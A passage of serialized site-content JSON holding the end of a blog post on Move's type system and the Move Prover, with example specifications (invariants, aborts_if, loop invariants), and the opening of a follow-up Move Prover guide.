verify",{"type":25,"tag":216,"props":12120,"children":12121},{"style":6953},[12122],{"type":31,"value":266},{"type":25,"tag":216,"props":12124,"children":12125},{"style":6936},[12126],{"type":31,"value":12127},"false",{"type":25,"tag":216,"props":12129,"children":12130},{"style":6964},[12131],{"type":31,"value":6967},{"type":25,"tag":216,"props":12133,"children":12134},{"class":6922,"line":7257},[12135,12140,12145,12150,12155],{"type":25,"tag":216,"props":12136,"children":12137},{"style":6947},[12138],{"type":31,"value":12139},"      ensures",{"type":25,"tag":216,"props":12141,"children":12142},{"style":6947},[12143],{"type":31,"value":12144}," result_1",{"type":25,"tag":216,"props":12146,"children":12147},{"style":6953},[12148],{"type":31,"value":12149}," \u003C=",{"type":25,"tag":216,"props":12151,"children":12152},{"style":6947},[12153],{"type":31,"value":12154}," coin1_in",{"type":25,"tag":216,"props":12156,"children":12157},{"style":6964},[12158],{"type":31,"value":6967},{"type":25,"tag":216,"props":12160,"children":12161},{"class":6922,"line":7275},[12162,12166,12171,12175,12180],{"type":25,"tag":216,"props":12163,"children":12164},{"style":6947},[12165],{"type":31,"value":12139},{"type":25,"tag":216,"props":12167,"children":12168},{"style":6947},[12169],{"type":31,"value":12170}," result_2",{"type":25,"tag":216,"props":12172,"children":12173},{"style":6953},[12174],{"type":31,"value":12149},{"type":25,"tag":216,"props":12176,"children":12177},{"style":6947},[12178],{"type":31,"value":12179}," coin2_in",{"type":25,"tag":216,"props":12181,"children":12182},{"style":6964},[12183],{"type":31,"value":6967},{"type":25,"tag":216,"props":12185,"children":12186},{"class":6922,"line":7296},[12187],{"type":25,"tag":216,"props":12188,"children":12189},{"style":6964},[12190],{"type":31,"value":9823},{"type":25,"tag":38,"props":12192,"children":12193},{},[12194],{"type":31,"value":12195},"There's no clean way to express this with an assert because this makes an observation across two functions which are temporally separated.",{"type":25,"tag":38,"props":12197,"children":12198},{},[12199,12201,12206],{"type":31,"value":12200},"Invariant's are also extremely useful. For example, enforcing invariants about fee parameters (fee can never be greater than 100%) or pool supply makes it a ",{"type":25,"tag":64,"props":12202,"children":12203},{},[12204],{"type":31,"value":12205},"lot",{"type":31,"value":12207}," easier to reason about the protocol.",{"type":25,"tag":38,"props":12209,"children":12210},{},[12211],{"type":31,"value":12212},"For example, Ian uses invariants to clearly define core properties of his AMM state.",{"type":25,"tag":206,"props":12214,"children":12216},{"className":6915,"code":12215,"language":6914,"meta":7,"style":7},"spec PoolState {\n    invariant supply >= MINIMUM_LIQUIDITY;\n}\n",[12217],{"type":25,"tag":82,"props":12218,"children":12219},{"__ignoreMap":7},[12220,12237,12260],{"type":25,"tag":216,"props":12221,"children":12222},{"class":6922,"line":6923},[12223,12228,12233],{"type":25,"tag":216,"props":12224,"children":12225},{"style":6947},[12226],{"type":31,"value":12227},"spec",{"type":25,"tag":216,"props":12229,"children":12230},{"style":7375},[12231],{"type":31,"value":12232}," PoolState",{"type":25,"tag":216,"props":12234,"children":12235},{"style":6964},[12236],{"type":31,"value":7241},{"type":25,"tag":216,"props":12238,"children":12239},{"class":6922,"line":6769},[12240,12245,12250,12255],{"type":25,"tag":216,"props":12241,"children":12242},{"style":6947},[12243],{"type":31,"value":12244},"    invariant",{"type":25,"tag":216,"props":12246,"children":12247},{"style":6947},[12248],{"type":31,"value":12249}," supply",{"type":25,"tag":216,"props":12251,"children":12252},{"style":6953},[12253],{"type":31,"value":12254}," >=",{"type":25,"tag":216,"props":12256,"children":12257},{"style":6964},[12258],{"type":31,"value":12259}," MINIMUM_LIQUIDITY;\n",{"type":25,"tag":216,"props":12261,"children":12262},{"class":6922,"line":6778},[12263],{"type":25,"tag":216,"props":12264,"children":12265},{"style":6964},[12266],{"type":31,"value":7874},{"type":25,"tag":38,"props":12268,"children":12269},{},[12270,12272,12278,12280,12286],{"type":31,"value":12271},"Another useful pattern for the Move prover is ",{"type":25,"tag":82,"props":12273,"children":12275},{"className":12274},[],[12276],{"type":31,"value":12277},"aborts_if",{"type":31,"value":12279},". More specifically, it can be very helpful to assert that a function never aborts, with ",{"type":25,"tag":82,"props":12281,"children":12283},{"className":12282},[],[12284],{"type":31,"value":12285},"aborts_if false",{"type":31,"value":179},{"type":25,"tag":38,"props":12288,"children":12289},{},[12290],{"type":31,"value":12291},"Although loop invariants are a bit clunky, Ian is also able to prove that a relatively nontrivial function doesn't abort.",{"type":25,"tag":206,"props":12293,"children":12295},{"className":6915,"code":12294,"language":6914,"meta":7,"style":7},"  fun multiply_vec_by_n_coins(input: vector\u003Cu64>): vector\u003Cu128> {\n      let amounts_times_coins = vector::empty\u003Cu128>();\n      let i = 0;\n      let n_coins = vector::length(&input);\n      while ({\n          spec {\n              invariant len(amounts_times_coins) == i;\n              invariant i \u003C= n_coins;\n              invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n          };\n          (i \u003C n_coins)\n      }) {\n          vector::push_back(\n              &mut amounts_times_coins,\n              (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n          );\n          i = i + 1;\n      };\n      spec {\n          assert i == n_coins;\n          assert len(input) == n_coins;\n      };\n      amounts_times_coins\n  }\n  spec multiply_vec_by_n_coins {\n      pragma opaque;\n      aborts_if false;\n      ensures len(result) == len(input);\n      ensures forall j in 0..len(input): result[j] == input[j] * len(input);\n  }\n",[12296],{"type":25,"tag":82,"props":12297,"children":12298},{"__ignoreMap":7},[12299,12363,12405,12428,12473,12486,12498,12537,12560,12648,12656,12681,12689,12710,12730,12830,12838,12867,12875,12887,12911,12946,12953,12961,12968,12983,12999,13017,13062,13168],{"type":25,"tag":216,"props":12300,"children":12301},{"class":6922,"line":6923},[12302,12306,12311,12315,12320,12324,12329,12333,12337,12342,12346,12350,12354,12359],{"type":25,"tag":216,"props":12303,"children":12304},{"style":6947},[12305],{"type":31,"value":10521},{"type":25,"tag":216,"props":12307,"children":12308},{"style":7047},[12309],{"type":31,"value":12310}," multiply_vec_by_n_coins",{"type":25,"tag":216,"props":12312,"children":12313},{"style":6964},[12314],{"type":31,"value":1850},{"type":25,"tag":216,"props":12316,"children":12317},{"style":6947},[12318],{"type":31,"value":12319},"input",{"type":25,"tag":216,"props":12321,"children":12322},{"style":6953},[12323],{"type":31,"value":1472},{"type":25,"tag":216,"props":12325,"children":12326},{"style":6947},[12327],{"type":31,"value":12328}," vector",{"type":25,"tag":216,"props":12330,"children":12331},{"style":6964},[12332],{"type":31,"value":9757},{"type":25,"tag":216,"props":12334,"children":12335},{"style":7375},[12336],{"type":31,"value":11994},{"type":25,"tag":216,"props":12338,"children":12339},{"style":6964},[12340],{"type":31,"value":12341},">)",{"type":25,"tag":216,"props":12343,"children":12344},{"style":6953},[12345],{"type":31,"value":1472},{"type":25,"tag":216,"props":12347,"children":12348},{"style":6947},[12349],{"type":31,"value":12328},{"type":25,"tag":216,"props":12351,"children":12352},{"style":6964},[12353],{"type":31,"value":9757},{"type":25,"tag":216,"props":12355,"children":12356},{"style":7375},[12357],{"type":31,"value":12358},"u128",{"type":25,"tag":216,"props":12360,"children":12361},{"style":6964},[12362],{"type":31,"value":11233},{"type":25,"tag":216,"props":12364,"children":12365},{"class":6922,"line":6769},[12366,12370,12375,12379,12383,12387,12392,12396,12400],{"type":25,"tag":216,"props":12367,"children":12368},{"style":6936},[12369],{"type":31,"value":12027},{"type":25,"tag":216,"props":12371,"children":12372},{"style":6947},[12373],{"type":31,"value":12374}," amounts_times_coins",{"type":25,"tag":216,"props":12376,"children":12377},{"style":6953},[12378],{"type":31,"value":6956},{"type":25,"tag":216,"props":12380,"children":12381},{"style":6964},[12382],{"type":31,"value":12328},{"type":25,"tag":216,"props":12384,"children":12385},{"style":6953},[12386],{"type":31,"value":7438},{"type":25,"tag":216,"props":12388,"children":12389},{"style":6947},[12390],{"type":31,"value":12391},"empty",{"type":25,"tag":216,"props":12393,"children":12394},{"style":6964},[12395],{"type":31,"value":9757},{"type":25,"tag":216,"props":12397,"children":12398},{"style":7375},[12399],{"type":31,"value":12358},{"type":25,"tag":216,"props":12401,"children":12402},{"style":6964},[12403],{"type":31,"value":12404},">();\n",{"type":25,"tag":216,"props":12406,"children":12407},{"class":6922,"line":6778},[12408,12412,12416,12420,12424],{"type":25,"tag":216,"props":12409,"children":12410},{"style":6936},[12411],{"type":31,"value":12027},{"type":25,"tag":216,"props":12413,"children":12414},{"style":6947},[12415],{"type":31,"value":7354},{"type":25,"tag":216,"props":12417,"children":12418},{"style":6953},[12419],{"type":31,"value":6956},{"type":25,"tag":216,"props":12421,"children":12422},{"style":6989},[12423],{"type":31,"value":6992},{"type":25,"tag":216,"props":12425,"children":12426},{"style":6964},[12427],{"type":31,"value":6967},{"type":25,"tag":216,"props":12429,"children":12430},{"class":6922,"line":7005},[12431,12435,12440,12444,12448,12452,12457,12461,12465,12469],{"type":25,"tag":216,"props":12432,"children":12433},{"style":6936},[12434],{"type":31,"value":12027},{"type":25,"tag":216,"props":12436,"children":12437},{"style":6947},[12438],{"type":31,"value":12439}," n_coins",{"type":25,"tag":216,"props":12441,"children":12442},{"style":6953},[12443],{"type":31,"value":6956},{"type":25,"tag":216,"props":12445,"children":12446},{"style":6964},[12447],{"type":31,"value":12328},{"type":25,"tag":216,"props":12449,"children":12450},{"style":6953},[12451],{"type":31,"value":7438},{"type":25,"tag":216,"props":12453,"children":12454},{"style":7047},[12455],{"type":31,"value":12456},"length",{"type":25,"tag":216,"props":12458,"children":12459},{"style":6964},[12460],{"type":31,"value":1850},{"type":25,"tag":216,"props":12462,"children":12463},{"style":6953},[12464],{"type":31,"value":7059},{"type":25,"tag":216,"props":12466,"children":12467},{"style":6947},[12468],{"type":31,"value":12319},{"type":25,"tag":216,"props":12470,"children":12471},{"style":6964},[12472],{"type":31,"value":7797},{"type":25,"tag":216,"props":12474,"children":12475},{"class":6922,"line":7110},[12476,12481],{"type":25,"tag":216,"props":12477,"children":12478},{"style":6973},[12479],{"type":31,"value":12480},"      while",{"type":25,"tag":216,"props":12482,"children":12483},{"style":6964},[12484],{"type":31,"value":12485}," ({\n",{"type":25,"tag":216,"props":12487,"children":12488},{"class":6922,"line":7216},[12489,12494],{"type":25,"tag":216,"props":12490,"children":12491},{"style":6947},[12492],{"type":31,"value":12493},"          spec",{"type":25,"tag":216,"props":12495,"children":12496},{"style":6964},[12497],{"type":31,"value":7241},{"type":25,"tag":216,"props":12499,"children":12500},{"class":6922,"line":7244},[12501,12506,12511,12515,12520,12524,12529,12533],{"type":25,"tag":216,"props":12502,"children":12503},{"style":6947},[12504],{"type":31,"value":12505},"              invariant",{"type":25,"tag":216,"props":12507,"children":12508},{"style":7047},[12509],{"type":31,"value":12510}," len",{"type":25,"tag":216,"props":12512,"children":12513},{"style":6964},[12514],{"type":31,"value":1850},{"type":25,"tag":216,"props":12516,"children":12517},{"style":6947},[12518],{"type":31,"value":12519},"amounts_times_coins",{"type":25,"tag":216,"props":12521,"children":12522},{"style":6964},[12523],{"type":31,"value":7036},{"type":25,"tag":216,"props":12525,"children":12526},{"style":6953},[12527],{"type":31,"value":12528},"==",{"type":25,"tag":216,"props":12530,"children":12531},{"style":6947},[12532],{"type":31,"value":7354},{"type":25,"tag":216,"props":12534,"children":12535},{"style":6964},[12536],{"type":31,"value":6967},{"type":25,"tag":216,"props":12538,"children":12539},{"class":6922,"line":7257},[12540,12544,12548,12552,12556],{"type":25,"tag":216,"props":12541,"children":12542},{"style":6947},[12543],{"type":31,"value":12505},{"type":25,"tag":216,"props":12545,"children":12546},{"style":6947},[12547],{"type":31,"value":7354},{"type":25,"tag":216,"props":12549,"children":12550},{"style":6953},[12551],{"type":31,"value":12149},{"type":25,"tag":216,"props":12553,"children":12554},{"style":6947},[12555],{"type":31,"value":12439},{"type":25,"tag":216,"props":12557,"children":12558},{"style":6964},[12559],{"type":31,"value":6967},{"type":25,"tag":216,"props":12561,"children":12562},{"class":6922,"line":7275},[12563,12567,12572,12577,12581,12585,12589,12593,12597,12601,12605,12610,12615,12619,12624,12628,12632,12636,12640,12644],{"type":25,"tag":216,"props":12564,"children":12565},{"style":6947},[12566],{"type":31,"value":12505},{"type":25,"tag":216,"props":12568,"children":12569},{"style":6947},[12570],{"type":31,"value":12571}," forall",{"type":25,"tag":216,"props":12573,"children":12574},{"style":6947},[12575],{"type":31,"value":12576}," j",{"type":25,"tag":216,"props":12578,"children":12579},{"style":6936},[12580],{"type":31,"value":6986},{"type":25,"tag":216,"props":12582,"children":12583},{"style":6989},[12584],{"type":31,"value":6992},{"type":25,"tag":216,"props":12586,"children":12587},{"style":6953},[12588],{"type":31,"value":6997},{"type":25,"tag":216,"props":12590,"children":12591},{"style":6947},[12592],{"type":31,"value":2289},{"type":25,"tag":216,"props":12594,"children":12595},{"style":6953},[12596],{"type":31,"value":1472},{"type":25,"tag":216,"props":12598,"children":12599},{"style":6947},[12600],{"type":31,"value":12374},{"type":25,"tag":216,"props":12602,"children":12603},{"style":6964},[12604],{"type":31,"value":7701},{"type":25,"tag":216,"props":12606,"children":12607},{"style":6947},[12608],{"type":31,"value":12609},"j",{"type":25,"tag":216,"props":12611,"children":12612},{"style":6964},[12613],{"type":31,"value":12614},"] ",{"type":25,"tag":216,"props":12616,"children":12617},{"style":6953},[12618],{"type":31,"value":12528},{"type":25,"tag":216,"props":12620,"children":12621},{"style":6947},[12622],{"type":31,"value":12623}," input",{"type":25,"tag":216,"props":12625,"children":12626},{"style":6964},[12627],{"type":31,"value":7701},{"type":25,"tag":216,"props":12629,"children":12630},{"style":6947},[12631],{"type":31,"value":12609},{"type":25,"tag":216,"props":12633,"children":12634},{"style":6964},[12635],{"type":31,"value":12614},{"type":25,"tag":216,"props":12637,"children":12638},{"style":6953},[12639],{"type":31,"value":8519},{"type":25,"tag":216,"props":12641,"children":12642},{"style":6947},[12643],{"type":31,"value":12439},{"type":25,"tag":216,"props":12645,"children":12646},{"style":6964},[12647],{"type":31,"value":6967},{"type":25,"tag":216,"props":12649,"children":12650},{"class":6922,"line":7296},[12651],{"type":25,"tag":216,"props":12652,"children":12653},{"style":6964},[12654],{"type":31,"value":12655},"          };\n",{"type":25,"tag":216,"props":12657,"children":12658},{"class":6922,"line":7305},[12659,12664,12668,12673,12677],{"type":25,"tag":216,"props":12660,"children":12661},{"style":6964},[12662],{"type":31,"value":12663},"          (",{"type":25,"tag":216,"props":12665,"children":12666},{"style":6947},[12667],{"type":31,"value":2289},{"type":25,"tag":216,"props":12669,"children":12670},{"style":6953},[12671],{"type":31,"value":12672}," \u003C",{"type":25,"tag":216,"props":12674,"children":12675},{"style":6947},[12676],{"type":31,"value":12439},{"type":25,"tag":216,"props":12678,"children":12679},{"style":6964},[12680],{"type":31,"value":7107},{"type":25,"tag":216,"props":12682,"children":12683},{"class":6922,"line":7557},[12684],{"type":25,"tag":216,"props":12685,"children":12686},{"style":6964},[12687],{"type":31,"value":12688},"      }) {\n",{"type":25,"tag":216,"props":12690,"children":12691},{"class":6922,"line":7574},[12692,12697,12701,12706],{"type":25,"tag":216,"props":12693,"children":12694},{"style":6964},[12695],{"type":31,"value":12696},"          vector",{"type":25,"tag":216,"props":12698,"children":12699},{"style":6953},[12700],{"type":31,"value":7438},{"type":25,"tag":216,"props":12702,"children":12703},{"style":7047},[12704],{"type":31,"value":12705},"push_back",{"type":25,"tag":216,"props":12707,"children":12708},{"style":6964},[12709],{"type":31,"value":7420},{"type":25,"tag":216,"props":12711,"children":12712},{"class":6922,"line":7591},[12713,12718,12722,12726],{"type":25,"tag":216,"props":12714,"children":12715},{"style":6953},[12716],{"type":31,"value":12717},"              &",{"type":25,"tag":216,"props":12719,"children":12720},{"style":6936},[12721],{"type":31,"value":7691},{"type":25,"tag":216,"props":12723,"children":12724},{"style":6947},[12725],{"type":31,"value":12374},{"type":25,"tag":216,"props":12727,"children":12728},{"style":6964},[12729],{"type":31,"value":7465},{"type":25,"tag":216,"props":12731,"children":12732},{"class":6922,"line":7604},[12733,12738,12742,12747,12751,12756,12760,12764,12768,12773,12777,12782,12786,12791,12796,12801,12805,12809,12813,12818,12822,12826],{"type":25,"tag":216,"props":12734,"children":12735},{"style":6964},[12736],{"type":31,"value":12737},"              (",{"type":25,"tag":216,"props":12739,"children":12740},{"style":6953},[12741],{"type":31,"value":8519},{"type":25,"tag":216,"props":12743,"children":12744},{"style":6964},[12745],{"type":31,"value":12746},"vector",{"type":25,"tag":216,"props":12748,"children":12749},{"style":6953},[12750],{"type":31,"value":7438},{"type":25,"tag":216,"props":12752,"children":12753},{"style":7047},[12754],{"type":31,"value":12755},"borrow",{"type":25,"tag":216,"props":12757,"children":12758},{"style":6964},[12759],{"type":31,"value":1850},{"type":25,"tag":216,"props":12761,"children":12762},{"style":6953},[12763],{"type":31,"value":7059},{"type":25,"tag":216,"props":12765,"children":12766},{"style":6947},[12767],{"type":31,"value":12319},{"type":25,"tag":216,"props":12769,"children":12770},{"style":6964},[12771],{"type":31,"value":12772},", (",{"type":25,"tag":216,"props":12774,"children":12775},{"style":6947},[12776],{"type":31,"value":2289},{"type":25,"tag":216,"props":12778,"children":12779},{"style":6936},[12780],{"type":31,"value":12781}," as",{"type":25,"tag":216,"props":12783,"children":12784},{"style":7375},[12785],{"type":31,"value":9811},{"type":25,"tag":216,"props":12787,"children":12788},{"style":6964},[12789],{"type":31,"value":12790},")) ",{"type":25,"tag":216,"props":12792,"children":12793},{"style":6936},[12794],{"type":31,"value":12795},"as",{"type":25,"tag":216,"props":12797,"children":12798},{"style":7375},[12799],{"type":31,"value":12800}," u128",{"type":25,"tag":216,"props":12802,"children":12803},{"style":6964},[12804],{"type":31,"value":7036},{"type":25,"tag":216,"props":12806,"children":12807},{"style":6953},[12808],{"type":31,"value":8519},{"type":25,"tag":216,"props":12810,"children":12811},{"style":6964},[12812],{"type":31,"value":7016},{"type":25,"tag":216,"props":12814,"children":12815},{"style":6947},[12816],{"type":31,"value":12817},"n_coins",{"type":25,"tag":216,"props":12819,"children":12820},{"style":6936},[12821],{"type":31,"value":12781},{"type":25,"tag":216,"props":12823,"children":12824},{"style":7375},[12825],{"type":31,"value":12800},{"type":25,"tag":216,"props":12827,"children":12828},{"style":6964},[12829],{"type":31,"value":7107},{"type":25,"tag":216,"props":12831,"children":12832},{"class":6922,"line":7613},[12833],{"type":25,"tag":216,"props":12834,"children":12835},{"style":6964},[12836],{"type":31,"value":12837},"          );\n",{"type":25,"tag":216,"props":12839,"children":12840},{"class":6922,"line":7636},[12841,12846,12850,12854,12859,12863],{"type":25,"tag":216,"props":12842,"children":12843},{"style":6947},[12844],{"type":31,"value":12845},"          i",{"type":25,"tag":216,"props":12847,"children":12848},{"style":6953},[12849],{"type":31,"value":6956},{"type":25,"tag":216,"props":12851,"children":12852},{"style":6947},[12853],{"type":31,"value":7354},{"type":25,"tag":216,"props":12855,"children":12856},{"style":6953},[12857],{"type":31,"value":12858}," +",{"type":25,"tag":216,"props":12860,"children":12861},{"style":6989},[12862],{"type":31,"value":8471},{"type":25,"tag":216,"props":12864,"children":12865},{"style":6964},[12866],{"type":31,"value":6967},{"type":25,"tag":216,"props":12868,"children":12869},{"class":6922,"line":7645},[12870],{"type":25,"tag":216,"props":12871,"children":12872},{"style":6964},[12873],{"type":31,"value":12874},"      };\n",{"type":25,"tag":216,"props":12876,"children":12877},{"class":6922,"line":7654},[12878,12883],{"type":25,"tag":216,"props":12879,"children":12880},{"style":6947},[12881],{"type":31,"value":12882},"      spec",{"type":25,"tag":216,"props":12884,"children":12885},{"style":6964},[12886],{"type":31,"value":7241},{"type":25,"tag":216,"props":12888,"children":12889},{"class":6922,"line":7722},[12890,12895,12899,12903,12907],{"type":25,"tag":216,"props":12891,"children":12892},{"style":6947},[12893],{"type":31,"value":12894},"          assert",{"type":25,"tag":216,"props":12896,"children":12897},{"style":6947},[12898],{"type":31,"value":7354},{"type":25,"tag":216,"props":12900,"children":12901},{"style":6953},[12902],{"type":31,"value":7232},{"type":25,"tag":216,"props":12904,"children":12905},{"style":6947},[12906],{"type":31,"value":12439},{"type":25,"tag":216,"props":12908,"children":12909},{"style":6964},[12910],{"type":31,"value":6967},{"type":25,"tag":216,"props":12912,"children":12913},{"class":6922,"line":7730},[12914,12918,12922,12926,12930,12934,12938,12942],{"type":25,"tag":216,"props":12915,"children":12916},{"style":6947},[12917],{"type":31,"value":12894},{"type":25,"tag":216,"props":12919,"children":12920},{"style":7047},[12921],{"type":31,"value":12510},{"type":25,"tag":216,"props":12923,"children":12924},{"style":6964},[12925],{"type":31,"value":1850},{"type":25,"tag":216,"props":12927,"children":12928},{"style":6947},[12929],{"type":31,"value":12319},{"type":25,"tag":216,"props":12931,"children":12932},{"style":6964},[12933],{"type":31,"value":7036},{"type":25,"tag":216,"props":12935,"children":12936},{"style":6953},[12937],{"type":31,"value":12528},{"type":25,"tag":216,"props":12939,"children":12940},{"style":6947},[12941],{"type":31,"value":12439},{"type":25,"tag":216,"props":12943,"children":12944},{"style":6964},[12945],{"type":31,"value":6967},{"type":25,"tag":216,"props":12947,"children":12948},{"class":6922,"line":7760},[12949],{"type":25,"tag":216,"props":12950,"children":12951},{"style":6964},[12952],{"type":31,"value":12874},{"type":25,"tag":216,"props":12954,"children":12955},{"class":6922,"line":7768},[12956],{"type":25,"tag":216,"props":12957,"children":12958},{"style":6947},[12959],{"type":31,"value":12960},"      amounts_times_coins\n",{"type":25,"tag":216,"props":12962,"children":12963},{"class":6922,"line":7800},[12964],{"type":25,"tag":216,"props":12965,"children":12966},{"style":6964},[12967],{"type":31,"value":9823},{"type":25,"tag":216,"props":12969,"children":12970},{"class":6922,"line":7808},[12971,12975,12979],{"type":25,"tag":216,"props":12972,"children":12973},{"style":6947},[12974],{"type":31,"value":12097},{"type":25,"tag":216,"props":12976,"children":12977},{"style":6947},[12978],{"type":31,"value":12310},{"type":25,"tag":216,"props":12980,"children":12981},{"style":6964},[12982],{"type":31,"value":7241},{"type":25,"tag":216,"props":12984,"children":12985},{"class":6922,"line":7868},[12986,12990,12995],{"type":25,"tag":216,"props":12987,"children":12988},{"style":6947},[12989],{"type":31,"value":12113},{"type":25,"tag":216,"props":12991,"children":12992},{"style":6947},[12993],{"type":31,"value":12994}," opaque",{"type":25,"tag":216,"props":12996,"children":12997},{"style":6964},[12998],{"type":31,"value":6967},{"type":25,"tag":216,"props":13000,"children":13002},{"class":6922,"line":13001},27,[13003,13008,13013],{"type":25,"tag":216,"props":13004,"children":13005},{"style":6947},[13006],{"type":31,"value":13007},"      aborts_if",{"type":25,"tag":216,"props":13009,"children":13010},{"style":6936},[13011],{"type":31,"value":13012}," false",{"type":25,"tag":216,"props":13014,"children":13015},{"style":6964},[13016],{"type":31,"value":6967},{"type":25,"tag":216,"props":13018,"children":13020},{"class":6922,"line":13019},28,[13021,13025,13029,13033,13038,13042,13046,13050,13054,13058],{"type":25,"tag":216,"props":13022,"children":13023},{"style":6947},[13024],{"type":31,"value":12139},{"type":25,"tag":216,"props":13026,"children":13027},{"style":7047},[13028],{"type":31,"value":12510},{"type":25,"tag":216,"props":13030,"children":13031},{"style":6964},[13032],{"type":31,"value":1850},{"type":25,"tag":216,"props":13034,"children":13035},{"style":6947},[13036],{"type":31,"value":13037},"result",{"type":25,"tag":216,"props":13039,"children":13040},{"style":6964},[13041],{"type":31,"value":7036},{"type":25,"tag":216,"props":13043,"children":13044},{"style":6953},[13045],{"type":31,"value":12528},{"type":25,"tag":216,"props":13047,"children":13048},{"style":7047},[13049],{"type":31,"value":12510},{"type":25,"tag":216,"props":13051,"children":13052},{"style":6964},[13053],{"type":31,"value":1850},{"type":25,"tag":216,"props":13055,"children":13056},{"style":6947},[13057],{"type":31,"value":12319},{"type":25,"tag":216,"props":13059,"children":13060},{"style":6964},[13061],{"type":31,"value":7797},{"type":25,"tag":216,"props":13063,"children":13065},{"class":6922,"line":13064},29,[13066,13070,13074,13078,13082,13086,13090,13095,13099,13103,13107,13111,13116,13120,13124,13128,13132,13136,13140,13144,13148,13152,13156,13160,13164],{"type":25,"tag":216,"props":13067,"children":13068},{"style":6947},[13069],{"type":31,"value":12139},{"type":25,"tag":216,"props":13071,"children":13072},{"style":6947},[13073],{"type":31,"value":12571},{"type":25,"tag":216,"props":13075,"children":13076},{"style":6947},[13077],{"type":31,"value":12576},{"type":25,"tag":216,"props":13079,"children":13080},{"style":6936},[13081],{"type":31,"value":6986},{"type":25,"tag":216,"props":13083,"children":13084},{"style":6989},[13085],{"type":31,"value":6992},{"type":25,"tag":216,"props":13087,"children":13088},{"style":6953},[13089],{"type":31,"value":6997},{"type":25,"tag":216,"props":13091,"children":13092},{"style":7047},[13093],{"type":31,"value":13094},"len",{"type":25,"tag":216,"props":13096,"children":13097},{"style":6964},[13098],{"type":31,"value":1850},{"type":25,"tag":216,"props":13100,"children":13101},{"style":6947},[13102],{"type":31,"value":12319},{"type":25,"tag":216,"props":13104,"children":13105},{"style":6964},[13106],{"type":31,"value":1888},{"type":25,"tag":216,"props":13108,"children":13109},{"style":6953},[13110],{"type":31,"value":1472},{"type":25,"tag":216,"props":13112,"children":13113},{"style":6947},[13114],{"type":31,"value":13115}," result",{"type":25,"tag":216,"props":13117,"children":13118},{"style":6964},[13119],{"type":31,"value":7701},{"type":25,"tag":216,"props":13121,"children":13122},{"style":6947},[13123],{"type":31,"value":12609},{"type":25,"tag":216,"props":13125,"children":13126},{"style":6964},[13127],{"type":31,"value":12614},{"type":25,"tag":216,"props":13129,"children":13130},{"style":6953},[13131],{"type":31,"value":12528},{"type":25,"tag":216,"props":13133,"children":13134},{"style":6947},[13135],{"type":31,"value":12623},{"type":25,"tag":216,"props":13137,"children":13138},{"style":6964},[13139],{"type":31,"value":7701},{"type":25,"tag":216,"props":13141,"children":13142},{"style":6947},[13143],{"type":31,"value":12609},{"type":25,"tag":216,"props":13145,"children":13146},{"style":6964},[13147],{"type":31,"value":12614},{"type":25,"tag":216,"props":13149,"children":13150},{"style":6953},[13151],{"type":31,"value":8519},{"type":25,"tag":216,"props":13153,"children":13154},{"style":7047},[13155],{"type":31,"value":12510},{"type":25,"tag":216,"props":13157,"children":13158},{"style":6964},[13159],{"type":31,"value":1850},{"type":25,"tag":216,"props":13161,"children":13162},{"style":6947},[13163],{"type":31,"value":12319},{"type":25,"tag":216,"props":13165,"children":13166},{"style":6964},[13167],{"type":31,"value":7797},{"type":25,"tag":216,"props":13169,"children":13171},{"class":6922,"line":13170},30,[13172],{"type":25,"tag":216,"props":13173,"children":13174},{"style":6964},[13175],{"type":31,"value":9823},{"type":25,"tag":26,"props":13177,"children":13178},{"id":9258},[13179],{"type":31,"value":9261},{"type":25,"tag":38,"props":13181,"children":13182},{},[13183],{"type":31,"value":13184},"In this post, we explored implications of Move's type system and formal verification, two powerful features of the Move language that enable safer programming languages.",{"type":25,"tag":38,"props":13186,"children":13187},{},[13188],{"type":31,"value":13189},"While Move as a language is still a language in active development, it shows some exciting features that seem allows developers to create structurally safer programs.",{"type":25,"tag":38,"props":13191,"children":13192},{},[13193,13195,13202],{"type":31,"value":13194},"We're passionate about pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":25,"tag":162,"props":13196,"children":13199},{"href":13197,"rel":13198},"https://twitter.com/notdeghost/",[166],[13200],{"type":31,"value":13201},"@notdeghost",{"type":31,"value":179},{"type":25,"tag":9316,"props":13204,"children":13205},{},[13206],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":13208},[13209,13210,13211],{"id":9709,"depth":6769,"text":9712},{"id":11748,"depth":6769,"text":11751},{"id":9258,"depth":6769,"text":9261},"content:blog:2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction",{"_path":13216,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":13217,"description":13218,"author":9670,"image":13219,"date":13222,"isFeatured":16,"tags":13223,"onBlogPage":16,"body":13226,"_type":6798,"_id":17569,"_source":6800,"_file":17570,"_stem":17571,"_extension":6803},"/blog/2022-09-16-move-prover","The Move Prover: A Guide","A practical guide to the Move Prover - tutorial, case study, and specifications.",{"src":13220,"height":13221,"width":9674},"/posts/move-prover/move-prover-title.jpg",1019,"2022-09-16",[13224,13225],"move","tutorial",{"type":22,"children":13227,"toc":17555},[13228,13247,13259,13265,13270,13275,13280,13289,13294,13308,13313,13319,13324,13338,13343,13480,13493,13498,13519,13553,13564,13569,13574,13584,13597,13940,13954,13972,14017,14030,14049,14221,14226,14231,14256,14261,14861,14873,14885,14890,14904,14909,14922,14962,14967,14999,15004,15009,15022,15407,15434,15641,15646,15658,15895,15900,15908,15927,16275,16280,16437,16442,16449,16463,16469,16474,16479,16485,16498,16730,16736,16741,16761,17030,17035,17041,17053,17058,17072,17078,17114,17214,17235,17241,17246,17251,17503,17508,17526,17530,17535,17540,17551],{"type":25,"tag":38,"props":13229,"children":13230},{},[13231,13233,13238,13240,13245],{"type":31,"value":13232},"Formal verification -- a powerful tool for ",{"type":25,"tag":64,"props":13234,"children":13235},{},[13236],{"type":31,"value":13237},"proving",{"type":31,"value":13239}," the correctness of your programs. How does it ",{"type":25,"tag":64,"props":13241,"children":13242},{},[13243],{"type":31,"value":13244},"actually",{"type":31,"value":13246}," work? This blog post will provide practical tips to help you use the Move Prover to its fullest potential, as well as explore a real-world example of how we used formal verification to secure a smart contract.",{"type":25,"tag":38,"props":13248,"children":13249},{},[13250,13252,13257],{"type":31,"value":13251},"At a high level, formal verification allows you to provide a specification for the program. This specification is then checked against symbolic inputs, allowing you to prove that your code follows the specification for ",{"type":25,"tag":64,"props":13253,"children":13254},{},[13255],{"type":31,"value":13256},"all",{"type":31,"value":13258}," possible 